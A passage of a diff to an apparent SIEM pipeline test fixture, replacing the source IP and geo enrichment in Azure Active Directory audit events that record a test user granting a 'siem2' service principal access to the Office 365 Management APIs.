Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125324600Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -17651,25 +16121,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17683,7 +16135,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -17819,7 +16271,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -17831,12 +16283,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036547200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125330300Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -17862,25 +16314,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -17894,7 +16328,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -18030,7 +16464,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -18042,12 +16476,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036551400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
